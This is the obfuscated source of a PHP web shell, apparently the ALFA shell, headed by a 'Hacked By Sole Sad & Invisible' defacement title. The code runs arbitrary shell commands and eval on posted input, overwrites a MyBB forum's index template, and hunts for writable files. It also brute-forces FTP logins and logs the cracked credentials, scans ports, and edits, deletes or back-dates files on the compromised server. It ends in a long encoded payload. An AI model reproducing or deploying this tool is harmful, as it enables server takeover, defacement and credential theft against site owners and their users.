<title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><p><input type='submit' value='' ></p></form></center></center>"; if (isset($_POST["alfa6"])) { $mybb_dbh = $_POST["alfa6"]; $mybb_dbu = $_POST["alfa7"]; $mybb_dbn = $_POST["alfa8"]; $mybb_dbp = $_POST["alfa9"]; $mybb_index = $_POST["alfa10"]; if (!empty($mybb_dbh) && !empty($mybb_dbu) && !empty($mybb_dbn) && !empty($mybb_index)) { $conn = @mysqli_connect($mybb_dbh, $mybb_dbu, $mybb_dbp, $mybb_dbn) or die(mysqli_error($conn)); $prefix = "mybb_"; $loli7 = "UPDATE " . $prefix . "templates SET template='" . $mybb_index . "' WHERE title='index'"; $result = @mysqli_query($conn, $loli7) or die(mysqli_error($conn)); __alert("MyBB index changed...!"); } } } echo "</div>"; alfafooter(); } goto H2ZQs; I2i3T: function Alfa_Searcher($dir, $ext, $method) { if (@is_readable($dir)) { if ($method == "all") { $ext = "*"; } if ($method == "dirs") { $ext = "*"; } $globFiles = @glob("{$dir}/*.{$ext}"); $globDirs = @glob("{$dir}/*", GLOB_ONLYDIR); $blacklist = array(); foreach ($globDirs as $dir) { if (!@is_readable($dir) || @is_link($dir)) { continue; } @Alfa_Searcher($dir, $ext, $method); } switch ($method) { case "files": foreach ($globFiles as $file) { if (@is_writable($file)) { echo "{$file}<br>"; } } break; case "dirs": foreach ($globFiles as $file) { if (@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)) { echo dirname($file) . "<br>"; $blacklist[] = dirname($file); } } break; case "all": foreach ($globFiles as $file) { echo $file . "<br>"; } break; } unset($blacklist); } } goto JTfLu; dfoFS: function alfaPerms($p) { if (($p & 49152) == 49152) { $i = "s\342\200\x8b"; } elseif (($p & 40960) == 40960) { $i = "l\xe2\x80\213"; } elseif (($p & 32768) == 32768) { $i = "-\342\200\x8b"; } elseif (($p & 24576) == 24576) { $i = "b\342\200\x8b"; } elseif (($p & 16384) == 16384) { $i = "d\xe2\x80\x8b"; } elseif (($p & 8192) == 8192) { $i = "c\xe2\x80\213"; } elseif (($p & 4096) == 4096) { $i = "p\342\x80\213"; } else { $i = "u\342\x80\213"; } $i .= $p & 256 ? "r\342\x80\x8b" : "-"; $i .= $p & 128 ? "w\342\200\x8b" : "-"; $i .= $p & 64 ? $p & 2048 ? "s\xe2\200\213" : "x\342\200\213" : ($p & 2048 ? "S\342\x80\213" : "-"); $i .= $p & 32 ? "r\342\x80\x8b" : "-"; $i .= $p & 16 ? "w\342\x80\213" : "-"; $i .= $p & 8 ? $p & 1024 ? "s\xe2\x80\213" : "x\342\x80\x8b" : ($p & 1024 ? "S\342\200\213" : "-"); $i .= $p & 4 ? "r\xe2\x80\x8b" : "-"; $i .= $p & 2 ? "w\xe2\200\x8b" : "-"; $i .= $p & 1 ? $p & 512 ? "t\342\x80\213" : "x\xe2\200\213" : ($p & 512 ? "T\xe2\x80\213" : "-"); return $i; } goto rihre; g2veP: function alfawhois() { echo "<div class='header'><center><p><div class='txtfont_header'>| Whois |</div></p><p><form onsubmit="g('whois',null,this.url.value,'>>');return false;"><div class='txtfont'>Url: </div> <input type='text' name='url' style='text-align:center;' size='50' placeholder='google.com'> <input type='submit' value=' '></form></p></center>"; if ($_POST["alfa2"] == ">>" && !empty($_POST["alfa1"])) { $site = str_replace(array("http://", "https://", "www.", "ftp://"), '', $_POST["alfa1"]); $target = "http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain=" . $site; $data = @file_get_contents($target); if ($data == '') { $get = new AlfaCURL(); $get->ssl = true; $data = $get->Send($target); } $target = @json_decode($data, true); echo __pre(); if (is_array($target)) { echo $target["whois_raw"]; } else { echo alfaEx("whois " . $site); } } echo "</div>"; } goto sPVEQ; iD68t: if (empty($_POST["a"])) { if (isset($default_action) && function_exists("alfa" . $default_action)) { $_POST["a"] = $default_action; } else { $_POST["a"] = "FilesMan2"; } } goto ctFJV; ZnLJg: define("__ALFA_DATA_FOLDER__", "ALFA_DATA"); goto QjYKO; OpFog: function reArrayFiles($file_post) { $file_ary = array(); $file_count = count($file_post["name"]); $file_keys = array_keys($file_post); for ($i = 0; $i < $file_count; $i++) { foreach ($file_keys as $key) { $file_ary[$i][$key] = $file_post[$key][$i]; } } return $file_ary; } goto yshb3; yshb3: function _alfa_can_runCommand($cgi = true, $cache = true) { if (isset($_COOKIE["alfa_canruncmd"]) && $cache) { return true; } if (strlen(alfaEx("whoami", false, $cgi)) > 0) { $_COOKIE["alfa_canruncmd"] = true; return true; } return false; } goto V1ePl; GzP8G: function alfahash() { if (!function_exists("hex2bin")) { function hex2bin($p) { return decbin(hexdec($p)); } } if (!function_exists("full_urlencode")) { function full_urlencode($p) { $r = ''; for ($i = 0; $i < strlen($p); ++$i) { $r .= "%" . dechex(ord($p[$i])); } return strtoupper($r); } } $stringTools = array("Base64_encode ( $string )" => "__ZW5jb2Rlcg($s)", "Base64_decode ( $string )" => "__ZGVjb2Rlcg($s)", "strrev ( $string )" => "strrev($s)", "bin2hex ( $string )" => "bin2hex($s)", "hex2bin ( $string )" => "hex2bin($s)", "md5 ( $string )" => "md5($s)", "sha1 ( $string )" => "sha1($s)", "hash ( "sha251", $string ) --> sha251" => "hash("sha256",$s)", "hash ( "sha384", $string ) --> sha384" => "hash("sha384",$s)", "hash ( "sha512", $string ) --> sha512" => "hash("sha512",$s)", "crypt ( $string )" => "crypt($s)", "crc32 ( $string )" => "crc32($s)", "str_rot13 ( $string )" => "str_rot13($s)", "urlencode ( $string )" => "urlencode($s)", "urldecode  ( $string )" => "urldecode($s)", "full_urlencode  ( $string )" => "full_urlencode($s)", "htmlspecialchars  ( $string )" => "htmlspecialchars($s)", "base64_encode (gzdeflate( $string , 9)) --> Encode" => "__ZW5jb2Rlcg(gzdeflate($s, 9))", "gzinflate (base64_decode( $string )) --> Decode" => "@gzinflate(__ZGVjb2Rlcg($s))", "str_rot13 (base64_encode( $string )) --> Encode" => "str_rot13(__ZW5jb2Rlcg($s))", "base64_decode (str_rot13( $string )) --> Decode" => "__ZGVjb2Rlcg(str_rot13($s))", "str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode" => "str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))", "gzinflate (base64_decode(str_rot13( $string ))) --> Decode" => "@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))"); alfahead(); echo "<div class=header>"; echo "<form onSubmit='g("hash",null,this.selectTool.value,this.input.value);return false;'><div class='txtfont'>Method:</div> <select name='selectTool' style='width:400px;'>"; foreach ($stringTools as $k => $v) { echo "<option value='" . htmlspecialchars($v) . "' " . ($_POST["alfa1"] == $v ? "selected" : '') . ">" . $k . "</option>"; } echo "</select> <input type='submit' value=' '/><br><textarea  name='input' style='margin-top:5px' class='bigarea'>" . (empty($_POST["alfa1"]) ? '' : htmlspecialchars(@$_POST["alfa2"])) . "</textarea></form>"; if (!empty($_POST["alfa1"])) { $string = addslashes($_POST["alfa2"]); $string = str_replace("\"", """, $string); $alg = $_POST["alfa1"]; $code = str_replace("$s", "'" . $string . "'", $alg); ob_start(); eval("echo " . $code . ";"); $res = ob_get_contents(); ob_end_clean(); if (in_array($alg, $stringTools)) { echo "<textarea class="bigarea">" . htmlspecialchars($res) . "</textarea>"; } } echo "</div>"; alfaFooter(); } goto tvxAH; L1x_B: if (!$CWppUDJxuf("b" . "a" . "se" . "6" . "4" . "_d" . "ecod" . "e" . '')) { function zRtSHsbTzV($input) { if (empty($input)) { return; } $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; $chr1 = $chr2 = $chr3 = ''; $enc1 = $enc2 = $enc3 = $enc4 = ''; $i = 0; $output = ''; $input = preg_replace("[^A-Za-z0-9\+\/\=]", '', $input); do { $enc1 = strpos($keyStr, substr($input, $i++, 1)); $enc2 = strpos($keyStr, substr($input, $i++, 1)); $enc3 = strpos($keyStr, substr($input, $i++, 1)); $enc4 = strpos($keyStr, substr($input, $i++, 1)); $chr1 = $enc1 << 2 | $enc2 >> 4; $chr2 = ($enc2 & 15) << 4 | $enc3 >> 2; $chr3 = ($enc3 & 3) << 6 | $enc4; $output = $output . chr((int) $chr1); if ($enc3 != 64) { $output = $output . chr((int) $chr2); } if ($enc4 != 64) { $output = $output . chr((int) $chr3); } $chr1 = $chr2 = $chr3 = ''; $enc1 = $enc2 = $enc3 = $enc4 = ''; } while ($i < strlen($input)); return $output; } } else { function zRtSHsbTzV($s) { $b = "b" . "a" . "se" . "6" . "4" . "_d" . "ecod" . "e" . ''; return $b($s); } } goto KQb_U; DvZ1R: @ini_set("magic_quotes_runtime", 0); goto BXSlk; JTLAP: function alfaGetDisFunc() { alfahead(); echo "<div class="header">"; $disfun = @ini_get("disable_functions"); $s = explode(",", $disfun); $f = array_unique($s); echo "<center><br><b><font color="#7CFC00">Disable Functions</font></b><pre><table border="1"><tr><td align="center" style="background-color: green;color: white;width:5%">#</td><td align="center" style="background-color: green;color: white;">Func Name</td></tr>"; $i = 1; foreach ($f as $s) { $s = trim($s); if (function_exists($s) || !is_callable($s)) { continue; } echo "<tr><td align="center" style="background-color: black;">" . $i . "</td>"; echo "<td align="center" style="background-color: black;"><a style="text-decoration: none;" target="_blank" href="http://php.net/manual/en/function." . str_replace("_", "-", $s) . ".php"><span class="disable_functions"><b>" . $s . "</b></span></a></td>"; $i++; } echo "</table></center>"; echo "</div>"; alfafooter(); } goto NOAKT; l9Nci: function decrypt_post($str) { if (__ALFA_POST_ENCRYPTION__) { $pwd = __ALFA_SECRET_KEY__; $pwd = __ZW5jb2Rlcg($pwd); $str = __ZGVjb2Rlcg($str); $enc_chr = ''; $enc_str = ''; $i = 0; while ($i < strlen($str)) { for ($j = 0; $j < strlen($pwd); $j++) { $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j])); $enc_str .= $enc_chr; $i++; if ($i >= strlen($str)) { break; } } } return __ZGVjb2Rlcg($enc_str); } else { return __ZGVjb2Rlcg($str); } } goto L6Kl6; Sp5QA: function __alfa_open_archive_file($arch, $base_id = 0) { try { $files = array(); $dirs = array(); $archive = new PharData($arch); foreach ($archive as $file) { $file_modify = @date("Y-m-d H:i:s", @filemtime($file->getPathname())); if ($file->isDir()) { $dirs[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "dir", "modify" => $file_modify); } else { $file_size = @filesize($file->getPathname()); $files[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "file", "modify" => $file_modify, "size" => $file_size); } } function __alfa_open_archive_usort($a, $b) { return strcmp(strtolower($a["name"]), strtolower($b["name"])) * 1; } usort($dirs, "__alfa_open_archive_usort"); usort($files, "__alfa_open_archive_usort"); $files = array_merge($dirs, $files); echo "<table width="100%" class="main" cellspacing="0" cellpadding="2"><tbody><tr><th>Name</th><th>Size</th><th>Modify</th><th>Actions</th></tr>"; $icon = "<img class="archive-icons" src="" . findicon("..", "dir") . "" width="30" height="30">"; echo "<tr><th><a base_id="" . $base_id . "" class="archive-file-row" fname=".." onclick="alfaOpenArchive(this);" path="" . dirname($arch . ".php") . "">" . $icon . "<span class="archive-name archive-type-dir">| .. |</span></a><td>dir</td><td>-</td><td>-</td></tr>"; foreach ($files as $file) { $icon = "<img class="archive-icons" src="" . findicon($file["name"], $file["type"]) . "" width="30" height="30">"; if ($file["type"] == "dir") { echo "<tr><th><a base_id="" . $base_id . "" class="archive-file-row" onclick="alfaOpenArchive(this);" path="" . $file["path"] . "" fname="" . $file["name"] . "">" . $icon . "<span class="archive-name archive-type-dir">| " . $file["name"] . " |</span></a><td>dir</td><td>" . $file["modify"] . "</td><td>-</td></tr>"; } else { echo "<tr><th><a base_id='" . $base_id . "' class='archive-file-row' onclick="editor('" . $file["path"] . "','auto','','','','file');">" . $icon . "<span class='archive-name archive-type-file' fname='" . $file["name"] . "'>" . $file["name"] . "</span></a><td>" . alfaSize($file["size"]) . "</td><td>" . $file["modify"] . "</td><td>-</td></tr>"; } } echo "</table>"; } catch (Exception $e) { echo "0"; } } goto h5ZJ7; f0Lpk: if ($GLOBALS["glob_chdir_false"]) { $GLOBALS["cwd"] = isset($_POST["c"]) && !empty($_POST["c"]) ? $_POST["c"] : @alfaGetCwd(); } goto HVzUJ; uIAcf: $GLOBALS["need_to_update_header"] = "false"; goto SbgNO; Qj51n: function alfaportscanner() { alfahead(); echo "<div class=header><center><p><div class="txtfont_header">| Port Scaner |</div></p>
<form action="" method="post" onsubmit="g('portscanner',null,null,this.start.value,this.end.value,this.host.value); return false;">
<input type="hidden" name="y" value="phptools">
<div class="txtfont">Host: </div> <input id="text" type="text" name="host" value="localhost"/>
<div class="txtfont">Port start: </div> <input id="text" size="5" type="text"  name="start" value="80"/>
<div class="txtfont">Port end: </div> <input id="text" size="5" type="text" name="end" value="80"/> <input type="submit" value=" " />
</form></center><br>"; $start = strip_tags($_POST["alfa2"]); $end = strip_tags($_POST["alfa3"]); $host = strip_tags($_POST["alfa4"]); if (isset($_POST["alfa4"]) && is_numeric($_POST["alfa3"]) && is_numeric($_POST["alfa2"])) { echo __pre(); $packetContent = "GET / HTTP/1.1
\xa
"; if (ctype_xdigit($packetContent)) { $packetContent = @pack("H*", $packetContent); } else { $packetContent = str_replace(array("\xd", "
"), '', $packetContent); $packetContent = str_replace(array("\r", "\n"), array("\xd", "\xa"), $packetContent); } for ($i = $start; $i <= $end; $i++) { $sock = @fsockopen($host, $i, $errno, $errstr, 3); if ($sock) { stream_set_timeout($sock, 5); fwrite($sock, $packetContent . "\xd

\xa\x0"); $counter = 0; $maxtry = 1; $bin = ''; do { $line = fgets($sock, 1024); if (trim($line) == '') { $counter++; } $bin .= $line; } while ($counter < $maxtry); fclose($sock); echo "<center><p>Port <font style='color:#DE3E3E'>{$i}</font> is open</p>"; echo "<p><textarea style='height:140px;width:50%;'>" . $bin . "</textarea></p></center>"; } flush(); } } echo "</div>"; alfafooter(); } goto D8OYb; N_oFU: function CrackerResualt($info) { $res = $info["target"] . " => " . $info["username"] . ":" . $info["password"] . "\xa"; $c = @fopen($info["fcrack"], "a+"); @fwrite($c, $res); @fclose($c); } goto te6n1; fhKEb: function alfaFilesTools() { alfahead(); echo "<div class="filestools" style="height: 100%;">"; if (isset($_POST["alfa1"])) { $_POST["alfa1"] = rawurldecode($_POST["alfa1"]); } $alfa1_decoded = $_POST["alfa1"]; $chdir_fals = false; if (!@chdir($_POST["c"])) { $chdir_fals = true; $_POST["alfa1"] = $_POST["c"] . "/" . $_POST["alfa1"]; $alfa_canruncmd = _alfa_can_runCommand(true, true); if ($alfa_canruncmd) { $slashed_alfa1 = addslashes($_POST["alfa1"]); $file_info = explode(":", alfaEx("stat -c "%F:%U:%G:%s:%Y:0%a:%A" "" . $slashed_alfa1 . """)); $perm_color_class = alfaEx("if [[ -w '" . $slashed_alfa1 . "' ]]; then echo main_green_perm; elif [[ -r '" . $slashed_alfa1 . "' ]]; then echo main_white_perm; else echo main_red_perm; fi"); } } if ($_POST["alfa2"] == "auto") { if (is_array(@getimagesize($_POST["alfa1"]))) { $_POST["alfa2"] = "image"; } else { $_POST["alfa2"] = "view"; if ($chdir_fals) { if ($alfa_canruncmd) { $mime = explode(":", alfaEx("file --mime-type '" . addslashes($_POST["alfa1"]) . "'")); $mimetype = $mime[1]; if (!empty($mimetype)) { if (strstr($mimetype, "image")) { $_POST["alfa2"] = "image"; } } } } } } if ($_POST["alfa2"] == "rename" && !empty($_POST["alfa3"]) && @is_writable($_POST["alfa1"])) { $rename_cache = $_POST["alfa3"]; } if (@$_POST["alfa2"] == "mkfile") { $_POST["alfa1"] = trim($_POST["alfa1"]); if ($chdir_fals && $alfa_canruncmd) { if (_alfa_is_writable($_POST["c"])) { alfaEx("cd '" . addslashes($_POST["c"]) . "';touch '" . addslashes($alfa1_decoded) . "'"); $_POST["alfa2"] = "edit"; } } if (!@file_exists($_POST["alfa1"])) { $fp = @fopen($_POST["alfa1"], "w"); if ($fp) { $_POST["alfa2"] = "edit"; fclose($fp); } } else { $_POST["alfa2"] = "edit"; } } if (!_alfa_file_exists(@$_POST["alfa1"])) { echo __pre() . "<center><p><div class="txtfont"><font color='red'>!...FILE DOEST NOT EXITS...!</font></div></p></center></div><script>editor_error=false;removeHistory('" . $_POST["alfa4"] . "');</script>"; alfaFooter(); return; } if ($chdir_fals) { $filesize = $file_info[3]; $uid["name"] = $file_info[1]; $gid["name"] = $file_info[2]; $permcolor = alfaPermsColor(array("class" => $perm_color_class, "num" => $file_info[5], "human" => $file_info[6]), true); } else { $uid = function_exists("posix_getpwuid") && function_exists("fileowner") ? @posix_getpwuid(@fileowner($_POST["alfa1"])) : ''; $gid = function_exists("posix_getgrgid") && function_exists("filegroup") ? @posix_getgrgid(@filegroup($_POST["alfa1"])) : ''; if (!$uid && !$gid) { $uid["name"] = function_exists("fileowner") ? @fileowner($_POST["alfa1"]) : ''; $gid["name"] = function_exists("filegroup") ? @filegroup($_POST["alfa1"]) : ''; } $permcolor = alfaPermsColor($_POST["alfa1"]); $filesize = @filesize($_POST["alfa1"]); if (!isset($uid["name"], $gid["name"]) || empty($uid["name"]) || empty($gid["name"])) { if (_alfa_can_runCommand()) { list($uid["name"], $gid["name"]) = explode(":", alfaEx("stat -c "%U:%G" "" . addslashes($_POST["c"] . "/" . $_POST["alfa1"]) . """)); } } } if (substr($_POST["alfa1"], 0, 7) == "phar://") { $alfa_file_directory = $_POST["alfa1"]; } else { $alfa_file_directory = str_replace("//", "/", ($chdir_fals ? '' : $_POST["c"] . "/") . $_POST["alfa1"]); } echo "<div style="overflow: hidden;white-space: nowrap;text-overflow: ellipsis;"><span class="editor_file_info_vars">Name:</span> " . htmlspecialchars(basename($alfa1_decoded)) . " <span class="editor_file_info_vars">Size:</span> " . alfaSize($filesize) . " <span class="editor_file_info_vars">Permission:</span> " . $permcolor . " <span class="editor_file_info_vars">Owner/Group:</span> " . $uid["name"] . "/" . $gid["name"] . " <span class="editor_file_info_vars">Directory:</span> " . dirname($alfa_file_directory) . "</div>"; if (empty($_POST["alfa2"])) { $_POST["alfa2"] = "view"; } if (!_alfa_is_dir($_POST["alfa1"])) { $m = array("View", "Download", "Highlight", "Chmod", "Rename", "Touch", "Delete", "Image", "Hexdump"); $ftype = "file"; } else { $m = array("Chmod", "Rename", "Touch"); $ftype = "dir"; } echo "<div>"; foreach ($m as $v) { echo $v == "Delete" ? "<a href="javascript:void(0);" onclick="var chk=confirm('Are You Sure For Delete This File ?');chk?editor('" . addslashes(!isset($rename_cache) ? $_POST["alfa1"] : $rename_cache) . "','" . strtolower($v) . "','','" . $_POST["c"] . "','" . $_POST["alfa4"] . "','" . $ftype . "'):'';"><span class="editor_actions">" . (strtolower($v) == @$_POST["alfa2"] ? "<b><span class="editor_actions"> " . $v . " </span> </b>" : $v) . " | </span></a> " : "<a href="javascript:void(0);" onclick="editor('" . addslashes(!isset($rename_cache) ? $_POST["alfa1"] : $rename_cache) . "','" . strtolower($v) . "','','" . $_POST["c"] . "','" . $_POST["alfa4"] . "','" . $ftype . "')"><span class="editor_actions">" . (strtolower($v) == @$_POST["alfa2"] ? "<b><span class="editor_actions"> " . $v . " </span> </b>" : $v) . " | </span></a>"; } echo "</div>"; switch ($_POST["alfa2"]) { case "view": case "edit": @chdir($_POST["c"]); $disabled_btn = ''; if (!@is_writable($_POST["alfa1"]) && !_alfa_is_writable($_POST["alfa1"])) { $disabled_btn = "disabled=disabled"; $disabled_btn_style = "background: #ff0000;color: #fff;"; } if (!empty($_POST["alfa3"])) { $_POST["alfa3"] = substr($_POST["alfa3"], 1); $time = @filemtime($_POST["alfa1"]); $fp = @__write_file($_POST["alfa1"], $_POST["alfa3"]); if ($chdir_fals && $alfa_canruncmd) { $rname = $alfa1_decoded; $randname = $rname . rand(111, 9999); $filepath = dirname($_SERVER["SCRIPT_FILENAME"]) . "/" . $randname; if ($fp = @__write_file($filepath, $_POST["alfa3"])) { alfaEx("mv '" . addslashes($filepath) . "' '" . addslashes($_POST["alfa1"]) . "';rm -f '" . addslashes($filepath) . "'"); } } if ($fp) { echo "Saved!<br>"; @touch($_POST["alfa1"], $time, $time); } } echo "<div class="editor-view"><div class="view-content editor-ace-controller"><div style="display:inline-block;">" . _alfa_load_ace_options("editor") . "<button style="border-radius:10px;" class="button ace-controler" onClick="copyToClipboard(this);">Copy</button> <button class="button ace-controler" onclick="alfaAceToFullscreen(this);">Full Screen</button> <button onclick="var ace_val = alfa_ace_editors.editor[this.getAttribute('ace_id')].getValue();editor('" . addslashes($alfa1_decoded) . "','edit','1'+ace_val,'" . $_POST["c"] . "','" . $_POST["alfa4"] . "','" . $ftype . "');return false;" class="button ace-controler ace-save-btn" style="width: 100px;height: 33px;" . $disabled_btn_style . "" " . $disabled_btn . ">save</button></div><pre class="ml1 view_ml_content">"; echo htmlspecialchars(__read_file($_POST["alfa1"])); echo "</pre></div></div>"; break; case "highlight": @chdir($_POST["c"]); if (@is_readable($_POST["alfa1"])) { echo "<div class="editor-view"><div class="view-content"><div class="ml1" style="background-color: #e1e1e1;color:black;">"; $code = @highlight_file($_POST["alfa1"], true); echo str_replace(array("<span ", "</span>"), array("<font ", "</font>"), $code) . "</div></div></div>"; } break; case "delete": @chdir($_POST["c"]); if (@is_writable($_POST["alfa1"]) || $GLOBALS["glob_chdir_false"]) { $deleted = true; if (!@unlink($_POST["alfa1"])) { $deleted = false; if ($alfa_canruncmd) { if (_alfa_is_writable($_POST["alfa1"])) { alfaEx("rm -f '" . addslashes($_POST["alfa1"]) . "'"); $deleted = true; } } } if ($deleted) { echo "File Deleted...<script>var elem = $("" . $_POST["alfa4"] . "").parentNode;elem.parentNode.removeChild(elem);delete editor_files["" . $_POST["alfa4"] . ""];</script>"; } else { echo "Error..."; } } break; case "chmod": @chdir($_POST["c"]); if (!empty($_POST["alfa3"])) { $perms = 0; for ($i = strlen($_POST["alfa3"]) - 1; $i >= 0; --$i) { $perms += (int) $_POST["alfa3"][$i] * pow(8, strlen($_POST["alfa3"]) - $i - 1); } if (!@chmod($_POST["alfa1"], $perms)) { if ($chdir_fals && $alfa_canruncmd) { alfaEx("cd '" . addslashes($_POST["c"]) . "';chmod " . addslashes($_POST["alfa3"]) . " '" . addslashes($alfa1_decoded) . "'"); echo "Success!"; } else { echo "<font color="#FFFFFF"><b>Can't set permissions!</b></font><br><script>document.mf.alfa3.value="";</script>"; } } else { echo "Success!"; } } clearstatcache(); AlfaNum(8, 9, 10, 7, 6, 5, 4, 2, 1); if ($chdir_fals) { $file_perm = $file_info[5]; } else { $file_perm = substr(sprintf("%o", @fileperms($_POST["alfa1"])), -4); } echo "<script>alfa3_="";</script><form onsubmit="editor('" . addslashes($_POST["alfa1"]) . "','" . $_POST["alfa2"] . "',this.chmod.value,'" . $_POST["c"] . "','" . $_POST["alfa4"] . "','" . $ftype . "');return false;"><input type="text" name="chmod" value="" . $file_perm . ""><input type=submit value=" "></form>"; break; case "hexdump": @chdir($_POST["c"]); $c = __read_file($_POST["alfa1"]); $n = 0; $h = array("00000000<br>", '', ''); $len = strlen($c); for ($i = 0; $i < $len; ++$i) { $h[1] .= sprintf("%02X", ord($c[$i])) . " "; switch (ord($c[$i])) { case 0: $h[2] .= " "; break; case 9: $h[2] .= " "; break; case 10: $h[2] .= " "; break; case 13: $h[2] .= " "; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i + 1 < $len) { $h[0] .= sprintf("%08X", $i + 1) . "<br>"; } $h[1] .= "<br>"; $h[2] .= "
"; } } echo "<div class="editor-view"><div class="view-content"><table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>" . $h[0] . "</pre></span></td><td bgcolor=#282828><pre>" . $h[1] . "</pre></td><td bgcolor=#333333><pre>" . htmlspecialchars($h[2]) . "</pre></td></tr></table></div></div>"; break; case "rename": @chdir($_POST["c"]); $alfa1_escape = addslashes($_POST["alfa1"]); $alfa3_escape = addslashes($_POST["alfa3"]); if (!empty($_POST["alfa3"])) { $cmd_rename = false; if ($chdir_fals && $alfa_canruncmd) { if (_alfa_is_writable($_POST["alfa1"])) { $alfa1_escape = addslashes($alfa1_decoded); alfaEx("cd '" . addslashes($_POST["c"]) . "';mv '" . $alfa1_escape . "' '" . addslashes($_POST["alfa3"]) . "'"); } else { $cmd_rename = true; } } else { $alfa1_escape = addslashes($_POST["alfa1"]); } if (!@rename($_POST["alfa1"], $_POST["alfa3"]) && $cmd_rename) { echo "Can't rename!<br>"; } else { echo "Renamed!<script>try{$("" . $_POST["alfa4"] . "").innerHTML = "<div class='editor-icon'>"+loadType('" . $alfa3_escape . "','" . $ftype . "','" . $_POST["alfa4"] . "')+"</div><div class='editor-file-name'>" . $alfa3_escape . "</div>";editor_files["" . $_POST["alfa4"] . ""].file = "" . $alfa3_escape . "";updateFileEditor("" . $alfa1_escape . "", "" . $alfa3_escape . "");" . ($ftype == "dir" ? "updateDirsEditor('" . $_POST["alfa4"] . "','" . $alfa1_escape . "');" : '') . "}catch(e){console.log(e)}</script>"; $alfa1_escape = $alfa3_escape; } } echo "<form onsubmit="editor('" . $alfa1_escape . "','" . $_POST["alfa2"] . "',this.name.value,'" . $_POST["c"] . "','" . $_POST["alfa4"] . "','" . $ftype . "');return false;"><input type="text" name="name" value="" . addslashes(htmlspecialchars(isset($_POST["alfa3"]) && $_POST["alfa3"] != '' ? $_POST["alfa3"] : $alfa1_decoded)) . ""><input type=submit value=" "></form>"; break; case "touch": @chdir($_POST["c"]); if (!empty($_POST["alfa3"])) { $time = strtotime($_POST["alfa3"]); if ($time) { $touched = false; if ($chdir_fals && $alfa_canruncmd) { alfaEx("cd '" . addslashes($_POST["c"]) . "';touch -d '" . htmlspecialchars(addslashes($_POST["alfa3"])) . "' '" . addslashes($alfa1_decoded) . "'"); $touched = true; } if (!@touch($_POST["alfa1"], $time, $time) && !$touched) { echo "Fail!"; } else { echo "Touched!"; } } else { echo "Bad time format!"; } } clearstatcache(); echo "<script>alfa3_="";</script><form onsubmit="editor('" . addslashes($_POST["alfa1"]) . "','" . $_POST["alfa2"] . "',this.touch.value,'" . $_POST["c"] . "','" . $_POST["alfa4"] . "','" . $ftype . "');return false;"><input type=text name=touch value="" . date("Y-m-d H:i:s", $chdir_fals ? $file_info[4] : @filemtime($_POST["alfa1"])) . ""><input type=submit value=" "></form>"; break; case "image": @chdir($_POST["c"]); echo "<hr>"; $file = $_POST["alfa1"]; $image_info = @getimagesize($file); if (is_array($image_info) || $chdir_fals) { $width = (int) $image_info[0]; $height = (int) $image_info[1]; if ($chdir_fals && $alfa_canruncmd) { $source = alfaEx("cat '" . addslashes($file) . "' | base64"); list($width, $height) = explode(":", alfaEx("identify -format '%w:%h' '" . addslashes($file) . "'")); $mime = explode(":", alfaEx("file --mime-type '" . addslashes($file) . "'")); $image_info["mime"] = $mime[1]; } else { $source = __ZW5jb2Rlcg(__read_file($file, false)); } $image_info_h = "Image type = <span>[</span> " . $image_info["mime"] . " <span>]</span><br>Image Size = <span>[ </span>" . $width . " x " . $height . "<span> ]</span><br>"; if ($width > 800) { $width = 800; } echo $content = "<div class='editor-view'><div class='view-content'><center>" . $image_info_h . "<br><img id='viewImage' style='max-width:100%;border:1px solid green;' src='data:" . $image_info["mime"] . ";base64," . $source . "' alt='" . $file . "'></center></div></div><br>"; } break; } echo "</div>"; alfaFooter(); } goto gIiwJ; Ze0OK: function __write_file($file, $content) { if ($fh = @fopen($file, "wb")) { if (fwrite($fh, $content) !== false) { return true; } } return false; } goto zUXll; Vyc3A: $xd .= "Shell Link : http://" . $_SERVER["SERVER_NAME"] . $_SERVER["PHP_SELF"] . "
"; goto i8Olb; i2b2c: function Alfa_FTPC($info) { if ($con = @ftp_connect($info["target"], $info["port"])) { if ($con) { $login = @ftp_login($con, $info["username"], $info["password"]); if ($login) { CrackerResualt($info); } } } @ftp_close($con); } goto N_oFU; PnxkJ: function alfaconnect() { alfahead(); $php = "7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7H